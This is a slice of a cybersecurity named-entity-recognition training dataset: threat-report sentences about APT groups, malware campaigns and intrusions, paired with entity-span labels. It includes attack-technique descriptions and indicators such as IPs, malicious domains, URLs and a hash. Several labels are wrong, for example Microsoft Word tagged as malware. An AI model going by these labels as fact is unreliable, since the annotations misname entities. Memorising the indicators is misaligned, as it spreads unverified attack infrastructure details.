{"text": "The researchers wrote : While profit is powerful motivation for any attacker , Yingmob ’ s apparent self-sufficiency and organizational structure make it well-positioned to expand into new business ventures , including productizing the access to the 85 million Android devices it controls . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation . APT33 : 64.251.19.214 mynetwork.ddns.net . Another example would be that of a person selling illicit products on the dark web .", "spans": {"ORGANIZATION: Yingmob": [[79, 86]], "SYSTEM: Android": [[261, 268]], "ORGANIZATION: FBI": [[291, 294]], "THREAT_ACTOR: HIDDEN COBRA actors": [[320, 339]], "THREAT_ACTOR: APT33": [[481, 486]], "IP_ADDRESS: 64.251.19.214": [[489, 502]], "DOMAIN: mynetwork.ddns.net": [[503, 521]]}, "info": {"id": "cyberner_stix_train_001244", "source": "cyberner_stix_train"}}
{"text": "When done , the bot is functional and ready to receive commands and perform overlay attacks . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co Ltd and Laoying Baichen Instruments Equipment Co Ltd . These domains were registered through the privacy protection services in 2008 and 2011 .", "spans": {"THREAT_ACTOR: APT10": [[135, 140]], "ORGANIZATION: Tianjin-based companies": [[168, 191]], "ORGANIZATION: Huaying Haitai Science": [[204, 226]]}, "info": {"id": "cyberner_stix_train_001245", "source": "cyberner_stix_train"}}
{"text": "Evolution of Rotexy 2014–2015 Since the malicious program was detected in 2014 , its main functions and propagation method have not changed : Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks—such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank—in recent history .", "spans": {"MALWARE: Rotexy": [[13, 19], [142, 148]], "TOOL: SYSCON": [[354, 360]], "MALWARE: malicious Word documents": [[389, 413]], "ORGANIZATION: government": [[581, 591]], "THREAT_ACTOR: actors": [[607, 613]]}, "info": {"id": "cyberner_stix_train_001246", "source": "cyberner_stix_train"}}
{"text": "CTU researchers identified a variety of post-compromise tools stored under %AppData% ( e.g. , \\AppData\\Roaming\\Temp ) on several compromised systems .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001247", "source": "cyberner_stix_train"}}
{"text": "This instruction is especially important for malware that tries to avoid user interaction by running in the background as a service . The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells .", "spans": {"THREAT_ACTOR: actors": [[138, 144]], "THREAT_ACTOR: OilRig": [[276, 282], [382, 388]], "MALWARE: delivery documents": [[428, 446]], "MALWARE: TwoFace webshells": [[457, 474]]}, "info": {"id": "cyberner_stix_train_001248", "source": "cyberner_stix_train"}}
{"text": "We will continue to monitor this ransomware family to ensure customers are protected and to share our findings and insights to the community for broad protection against these evolving mobile threats . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . considering multiple control flow dispatchers and various jump cases for control flow flattening . The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": {"THREAT_ACTOR: Ke3chang": [[202, 210]], "VULNERABILITY: Java zero-day vulnerability": [[232, 259]], "VULNERABILITY: CVE-2012-4681": [[262, 275]], "MALWARE: Microsoft Word": [[321, 335]], "VULNERABILITY: CVE-2010-3333": [[338, 351]], "TOOL: Adobe PDF Reader": [[358, 374]], "VULNERABILITY: CVE-2010-2883": [[377, 390]], "TOOL: Python script": [[524, 537]], "ORGANIZATION: CrowdStrike researchers": [[565, 588]], "THREAT_ACTOR: Play ransomware attacks": [[631, 654]]}, "info": {"id": "cyberner_stix_train_001249", "source": "cyberner_stix_train"}}
{"text": "To illustrate the level of threat the DEFENSOR ID app posed , we performed three tests . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence .", "spans": {"MALWARE: DEFENSOR ID": [[38, 49]], "THREAT_ACTOR: Turla": [[116, 121]], "TOOL: PowerShell": [[131, 141]], "THREAT_ACTOR: HIDDEN COBRA actors": [[217, 236]], "MALWARE: FALLCHILL": [[249, 258]], "MALWARE: malware": [[259, 266]]}, "info": {"id": "cyberner_stix_train_001250", "source": "cyberner_stix_train"}}
{"text": "At runtime , the packer decompresses the resource and uses Reflection to load the assembly , find its Entry point , and Invoke it .", "spans": {}, "info": {"id": "cyberner_stix_train_001251", "source": "cyberner_stix_train"}}
{"text": "With the Kelihos spam botnet no longer in operation and Levashov behind bars , multiple criminal operators turned to different spam botnets to distribute their crimeware . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"TOOL: Kelihos spam botnet": [[9, 28]], "ORGANIZATION: Secureworks": [[211, 222]], "THREAT_ACTOR: BRONZE BUTLER": [[234, 247]], "VULNERABILITY: CVE-2016-7836": [[314, 327]]}, "info": {"id": "cyberner_stix_train_001252", "source": "cyberner_stix_train"}}
{"text": "Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting .", "spans": {"MALWARE: Trojan": [[157, 163], [290, 296]], "TOOL: C2": [[198, 200]]}, "info": {"id": "cyberner_stix_train_001253", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Lab’s experts calculated the amount of stolen data stored on NetTraveler’s C&C servers to be more than 22 gigabytes . Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker’s server . Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea’s media , manufacturing and universities , around February and March 2019 . SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . Now , Silence is one of the most active threat actors targeting the financial sector . Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence’s activity . Since the report’s release in September 2018 , Group-IB’s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . Like the majority of APT groups , Silence uses phishing as their infection vector . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Group-IB has also detected recon emails sent out to New Zealand . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .lNK shortcuts as malicious attachments .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: NetTraveler’s": [[71, 84]], "THREAT_ACTOR: SectorJ04": [[176, 185], [390, 399], [659, 668], [1196, 1205], [1223, 1232], [1321, 1330], [1450, 1459], [1886, 1895], [2091, 2100], [2405, 2414], [2773, 2782], [2876, 2885], [3239, 3248], [3557, 3566], [3811, 3820], [4015, 4024], [4191, 4200], [4379, 4388], [4508, 4517], [4658, 4667], [4869, 4878]], "TOOL: email": [[203, 208], [3179, 3184], [3485, 3490], [3917, 3922], [4225, 4230], [5107, 5112]], "MALWARE: backdoors": [[264, 273]], "FILEPATH: Backdoor": [[276, 284]], "MALWARE: AdroMut": [[457, 464], [1124, 1131], [2675, 2682]], "MALWARE: FlowerPippi": [[469, 480], [1157, 1168], [2687, 2698]], "THREAT_ACTOR: attacker’s": [[626, 636], [4321, 4331]], "FILEPATH: email stealer": [[846, 859]], "TOOL: Outlook": [[996, 1003]], "TOOL: Thunderbird": [[1008, 1019]], "MALWARE: exploit kits": [[1532, 1544]], "MALWARE: Locky": [[1589, 1594]], "MALWARE: GlobeImporter": [[1599, 1612]], "ORGANIZATION: banking": [[1630, 1637]], "MALWARE: Trojan": [[1638, 1644]], "THREAT_ACTOR: SectorJ04's": [[1700, 1711]], "TOOL: emails": [[1771, 1777], [2136, 2142], [2232, 2238], [2335, 2341], [5090, 5096], [6952, 6958], [7154, 7160], [7370, 7376], [7597, 7603], [8023, 8029]], "ORGANIZATION: electronics": [[2470, 2481]], "ORGANIZATION: telecommunications": [[2486, 2504]], "ORGANIZATION: international": [[2507, 2520]], "ORGANIZATION: manufacturing": [[2533, 2546], [4125, 4138]], "MALWARE: ServHelper": [[2590, 2600], [2731, 2741]], "MALWARE: FlawedAmmy": [[2605, 2615], [2746, 2756]], "MALWARE: ransomware": [[3332, 3342]], "MALWARE: banking trojans": [[3347, 3362]], "ORGANIZATION: companies": [[3982, 3991]], "ORGANIZATION: media": [[4117, 4122]], "ORGANIZATION: universities": [[4143, 4155]], "TOOL: Word": [[4270, 4274]], "ORGANIZATION: financial": [[4434, 4443], [4565, 4574], [5445, 5454]], "ORGANIZATION: education": [[4772, 4781]], "ORGANIZATION: job openings": [[4784, 4796]], "ORGANIZATION: real estate": [[4799, 4810]], "ORGANIZATION: semiconductors": [[4815, 4829]], "THREAT_ACTOR: groups": [[5264, 5270]], "THREAT_ACTOR: Silence": [[5383, 5390], [5665, 5672], [5801, 5808], [6275, 6282], [6319, 6326], [6820, 6827], [7095, 7102], [7323, 7330], [7461, 7468], [7565, 7572], [7991, 7998]], "THREAT_ACTOR: Silence:": [[5504, 5512]], "ORGANIZATION: Group-IB's": [[5637, 5647]], "MALWARE: Ivoke": [[5828, 5833]], "MALWARE: EDA agent": [[5860, 5869]], "TOOL: PowerShell": [[5888, 5898]], "ORGANIZATION: Going Global": [[5914, 5926]], "THREAT_ACTOR: Silence’s activity": [[6117, 6135]], "ORGANIZATION: Group-IB’s": [[6185, 6195]], "ORGANIZATION: banks": [[6257, 6262], [7380, 7385]], "THREAT_ACTOR: Group-IB’s": [[6580, 6590], [7720, 7730]], "THREAT_ACTOR: actor’s": [[6944, 6951]], "FILEPATH: malicious payload": [[7005, 7022]], "ORGANIZATION: users": [[7087, 7092]], "ORGANIZATION: Group-IB": [[7226, 7234]], "FILEPATH: recon emails": [[7253, 7265]], "ORGANIZATION: Asian market": [[7503, 7515]], "THREAT_ACTOR: Silence’s": [[7774, 7783]], "THREAT_ACTOR: silence": [[8119, 8126]], "ORGANIZATION: Microsoft": [[8138, 8147]], "FILEPATH: .lNK": [[8207, 8211]]}, "info": {"id": "cyberner_stix_train_001254", "source": "cyberner_stix_train"}}
{"text": "And later 2016 , their focus turned towards the Olympics ’ and the World Anti-Doping Agency ( WADA ) and Court of Arbitration for Sports ( CAS ) , when individuals and servers in these organizations were phished and compromised .", "spans": {"ORGANIZATION: Olympics": [[48, 56]], "ORGANIZATION: World Anti-Doping Agency": [[67, 91]], "ORGANIZATION: WADA": [[94, 98]], "ORGANIZATION: Court of Arbitration for Sports": [[105, 136]], "ORGANIZATION: CAS": [[139, 142]]}, "info": {"id": "cyberner_stix_train_001255", "source": "cyberner_stix_train"}}
{"text": "This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle ( MitM ) attacks . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . APT39 is Oan Iranian cyber espionage group that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: NewsBeef": [[191, 199]], "THREAT_ACTOR: APT39": [[348, 353]]}, "info": {"id": "cyberner_stix_train_001256", "source": "cyberner_stix_train"}}
{"text": "Figure 6 – Ransomware component Anubis has been known to utilize Twitter or Telegram to retrieve the C2 address and this sample is no exception ( Figure 7 ) . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"MALWARE: Anubis": [[32, 38]], "ORGANIZATION: Twitter": [[65, 72]], "ORGANIZATION: Telegram": [[76, 84]], "THREAT_ACTOR: ScarCruft": [[320, 329]], "MALWARE: FakeSG": [[480, 486]]}, "info": {"id": "cyberner_stix_train_001257", "source": "cyberner_stix_train"}}
{"text": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity .", "spans": {}, "info": {"id": "cyberner_stix_train_001258", "source": "cyberner_stix_train"}}
{"text": "It uses the base Dalvik User-Agent string for the device it ’ s running on . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . TAU investigated the ANEL obfuscation algorithms then modified the HexRaysDeob code to defeat the obfuscations . Further analyses of these similarities are available via Mandiant Advantage .", "spans": {"ORGANIZATION: banks": [[110, 115]], "ORGANIZATION: media": [[118, 123]], "ORGANIZATION: government agencies": [[130, 149]], "THREAT_ACTOR: APT38": [[177, 182]], "ORGANIZATION: TAU": [[204, 207]], "MALWARE: ANEL": [[225, 229]], "TOOL: HexRaysDeob": [[271, 282]], "ORGANIZATION: Mandiant Advantage": [[374, 392]]}, "info": {"id": "cyberner_stix_train_001259", "source": "cyberner_stix_train"}}
{"text": "Memory collection and analysis can be an extremely valuable component of an incident response plan and in this case proved crucial in identifying TG-1314 's actions on objective .", "spans": {"THREAT_ACTOR: TG-1314": [[146, 153]]}, "info": {"id": "cyberner_stix_train_001260", "source": "cyberner_stix_train"}}
{"text": "If the file exists it then moves it to “ __tmpdt.tmp ” in the same directory and continues the installation .", "spans": {"FILEPATH: __tmpdt.tmp": [[41, 52]]}, "info": {"id": "cyberner_stix_train_001261", "source": "cyberner_stix_train"}}
{"text": "Figure 6 . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . Second stage samples ( Win64/Winnti.BN ) A clever example was ‘ Office Monkeys LOL Video.zip ’ .", "spans": {"FILEPATH: Win64/Winnti.BN": [[194, 209]]}, "info": {"id": "cyberner_stix_train_001262", "source": "cyberner_stix_train"}}
{"text": "DeltaCharlie is a DDoS tool capable of launching Domain Name System ( DNS ) attacks , Network Time Protocol ( NTP ) attacks , and Carrier Grade NAT ( CGN ) attacks .", "spans": {"MALWARE: DeltaCharlie": [[0, 12]], "TOOL: Domain Name System": [[49, 67]], "TOOL: DNS": [[70, 73]], "TOOL: Carrier Grade NAT": [[130, 147]], "TOOL: CGN": [[150, 153]]}, "info": {"id": "cyberner_stix_train_001263", "source": "cyberner_stix_train"}}
{"text": "There have also been cases of users in Ukraine , Germany , Turkey and several other countries being affected . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . FireEye is highlighting a Cyber Espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": {"MALWARE: CONFUCIUS_B": [[127, 138]], "MALWARE: CONFUCIUS_A": [[161, 172]], "TOOL: SFX binary files": [[211, 227]], "ORGANIZATION: FireEye": [[230, 237]], "THREAT_ACTOR: actor": [[385, 390]], "THREAT_ACTOR: APT40": [[399, 404]]}, "info": {"id": "cyberner_stix_train_001264", "source": "cyberner_stix_train"}}
{"text": "The DllMain function is identical and starts the main thread ; the “ Applicate ” function is identical to the one in the newer library .", "spans": {}, "info": {"id": "cyberner_stix_train_001265", "source": "cyberner_stix_train"}}
{"text": "The report documented an advanced threat group they attributed to China .", "spans": {}, "info": {"id": "cyberner_stix_train_001266", "source": "cyberner_stix_train"}}
{"text": "It had again cloned a different legitimate Japanese website to host its malicious app , similar to what FakeSpy had also done before . APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . This query uses a receive structure similar to an M action; it is worth noting all of the receiver operation queries made in ping mode use the [System.Net.Dns]::GetHostAddresses . We assess \" pack\\scil\\s1.txt \" is likely a file containing SCIL commands the attackers executed in MicroSCADA .", "spans": {"MALWARE: FakeSpy": [[104, 111]], "THREAT_ACTOR: APT19": [[135, 140]], "ORGANIZATION: defense sector firms": [[166, 186]], "ORGANIZATION: political , financial , pharmaceutical and energy sectors": [[218, 275]]}, "info": {"id": "cyberner_stix_train_001267", "source": "cyberner_stix_train"}}
{"text": "All the detections of this backdoored app were geolocated in Iran . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . It has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {"ORGANIZATION: Palo Alto": [[83, 92]], "THREAT_ACTOR: DarkHydrus": [[103, 113]], "ORGANIZATION: governments": [[157, 168]]}, "info": {"id": "cyberner_stix_train_001268", "source": "cyberner_stix_train"}}
{"text": "The second script calls VirtualAlloc to create a buffer , uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread .", "spans": {"MALWARE: The second script": [[0, 17]]}, "info": {"id": "cyberner_stix_train_001269", "source": "cyberner_stix_train"}}
{"text": "Once installed , it displayed the icon found in the actual Netflix app on Google Play . Group-IB has also detected recon emails sent out to New Zealand . Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group .", "spans": {"SYSTEM: Netflix app": [[59, 70]], "SYSTEM: Google Play": [[74, 85]], "ORGANIZATION: Group-IB": [[88, 96]], "MALWARE: recon emails": [[115, 127]], "ORGANIZATION: Kaspersky": [[192, 201]], "THREAT_ACTOR: Anunak": [[250, 256]], "ORGANIZATION: banks": [[275, 280], [338, 343]]}, "info": {"id": "cyberner_stix_train_001270", "source": "cyberner_stix_train"}}
{"text": "Currently , the Twitoor trojan has been downloading several versions of mobile banking malware . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.” These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years .", "spans": {"MALWARE: Twitoor": [[16, 23]], "THREAT_ACTOR: Scattered Canary": [[133, 149]], "THREAT_ACTOR: Lazarus": [[410, 417]], "ORGANIZATION: banking sector": [[464, 478]], "ORGANIZATION: finance": [[481, 488]], "ORGANIZATION: trading companies": [[495, 512]], "ORGANIZATION: casinos": [[526, 533]]}, "info": {"id": "cyberner_stix_train_001271", "source": "cyberner_stix_train"}}
{"text": "This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document .", "spans": {"MALWARE: backdoor": [[14, 22]], "FILEPATH: VBA2Graph": [[207, 216]]}, "info": {"id": "cyberner_stix_train_001272", "source": "cyberner_stix_train"}}
{"text": "Using intelligence from our in-depth investigation , Windows Defender ATP can raise alerts for malicious behavior employed by FinFisher ( such as memory injection in persistence ) in different stages of the attack kill chain . Spring Dragon 's infiltration techniques there were not simply spearphish . After all , it is embedded inside a legitimate executable that still needs to run . In late 2021 and 2022 , Cuba ransomware delivered an increasing number of highprofile attacks .", "spans": {"SYSTEM: Windows Defender ATP": [[53, 73]], "MALWARE: FinFisher": [[126, 135]], "THREAT_ACTOR: Spring Dragon": [[227, 240]]}, "info": {"id": "cyberner_stix_train_001273", "source": "cyberner_stix_train"}}
{"text": "How does Gooligan work ? Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . and has only read accesses . The goal of studying IoAs is to understand the intent of a malicious user accessing the information and network resources of the organization , even when a malicious payload is not yet delivered , and all computing interactions can be considered as legitimate and authorized .", "spans": {"MALWARE: Gooligan": [[9, 17]], "TOOL: Remexi": [[25, 31]], "THREAT_ACTOR: attackers": [[72, 81]], "THREAT_ACTOR: malicious user": [[232, 246]], "MALWARE: malicious payload": [[329, 346]]}, "info": {"id": "cyberner_stix_train_001274", "source": "cyberner_stix_train"}}
{"text": "] it server3fi.exodus.connexxa [ . Dragos' data indicates XENOTIME remains active . URL : http://nicoledotson.icu/debby/weatherford/Zavantazhyty . Sandworm ’s substation attack reveals notable insights into Russia ’s continued investment in OT - oriented offensive cyber capabilities and overall approach to attacking OT systems .", "spans": {"ORGANIZATION: Dragos'": [[35, 42]], "THREAT_ACTOR: XENOTIME": [[58, 66]], "URL: http://nicoledotson.icu/debby/weatherford/Zavantazhyty": [[90, 144]], "THREAT_ACTOR: Sandworm ’s substation attack": [[147, 176]], "SYSTEM: OT systems": [[318, 328]]}, "info": {"id": "cyberner_stix_train_001275", "source": "cyberner_stix_train"}}
{"text": "Additionally , this incident exposes the global nature of cyber threats and the value of worldwide perspective – a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"THREAT_ACTOR: PLATINUM": [[258, 266]], "ORGANIZATION: specific individuals": [[340, 360]], "VULNERABILITY: zero-day": [[401, 409]]}, "info": {"id": "cyberner_stix_train_001276", "source": "cyberner_stix_train"}}
{"text": "HD_Audio.exe : 0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a connects to manual.newphoneapp.com .", "spans": {"FILEPATH: HD_Audio.exe": [[0, 12]], "FILEPATH: 0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a": [[15, 79]], "DOMAIN: manual.newphoneapp.com": [[92, 114]]}, "info": {"id": "cyberner_stix_train_001277", "source": "cyberner_stix_train"}}
{"text": "It adds the file extension .AnubisCrypt to each encrypted file and sends it to the C2 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"THREAT_ACTOR: Wild Neutron": [[88, 100]], "TOOL: stolen code signing certificate": [[127, 158]], "ORGANIZATION: electronics": [[182, 193]], "VULNERABILITY: Flash Player exploit": [[220, 240]], "THREAT_ACTOR: ScarCruft": [[338, 347]], "ORGANIZATION: RussianPanda": [[363, 375]], "MALWARE: RogueRaticate": [[421, 434]]}, "info": {"id": "cyberner_stix_train_001278", "source": "cyberner_stix_train"}}
{"text": "To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA . Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each .", "spans": {"TOOL: keyloggers": [[44, 54]], "TOOL: Corkow": [[66, 72]]}, "info": {"id": "cyberner_stix_train_001279", "source": "cyberner_stix_train"}}
{"text": "FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the “ TRITON actor ” when preparing to deploy the TRITON / TRISIS malware framework in 2017 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: TRITON": [[104, 110], [148, 154]], "MALWARE: TRISIS": [[157, 163]]}, "info": {"id": "cyberner_stix_train_001280", "source": "cyberner_stix_train"}}
{"text": "CLOAKING Client-side Carrier Checks In our basic command & control example above , we didn ’ t address the ( incorrectly labeled ) “ imei ” field . Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers – which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab . Next , the ZxShell Load-Image Notify function prevents the AV processes from restarting . The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": {"ORGANIZATION: Kaspersky Lab": [[393, 406]], "MALWARE: ZxShell": [[420, 427]], "ORGANIZATION: Information and Communications Technology ( ICT ) sectors": [[577, 634]]}, "info": {"id": "cyberner_stix_train_001281", "source": "cyberner_stix_train"}}
{"text": "] 30 . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": {"THREAT_ACTOR: APT41": [[7, 12]], "TOOL: malware families": [[55, 71]], "TOOL: tools": [[76, 81]], "THREAT_ACTOR: group": [[235, 240]], "THREAT_ACTOR: APT32": [[253, 258]], "FILEPATH: Vietnam.exe": [[357, 368]]}, "info": {"id": "cyberner_stix_train_001282", "source": "cyberner_stix_train"}}
{"text": "This document discusses a recent targeted attack campaign directed primarily at private companies involved in the research , development , and manufacture of chemicals and advanced materials .", "spans": {}, "info": {"id": "cyberner_stix_train_001283", "source": "cyberner_stix_train"}}
{"text": "] 23 222.139.212 [ . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": {"THREAT_ACTOR: APT41": [[44, 49]], "TOOL: Sticky Keys": [[74, 85]], "TOOL: scheduled tasks": [[102, 117]], "TOOL: bootkits": [[120, 128]], "TOOL: rootkits": [[131, 139]], "TOOL: registry modifications": [[142, 164]], "THREAT_ACTOR: actors": [[274, 280]]}, "info": {"id": "cyberner_stix_train_001284", "source": "cyberner_stix_train"}}
{"text": "The file system commands underling handlers and IPacket were modified to support more features , so these commands don’t work out of the box and required manual implementation from us .", "spans": {"TOOL: file system": [[4, 15]]}, "info": {"id": "cyberner_stix_train_001285", "source": "cyberner_stix_train"}}
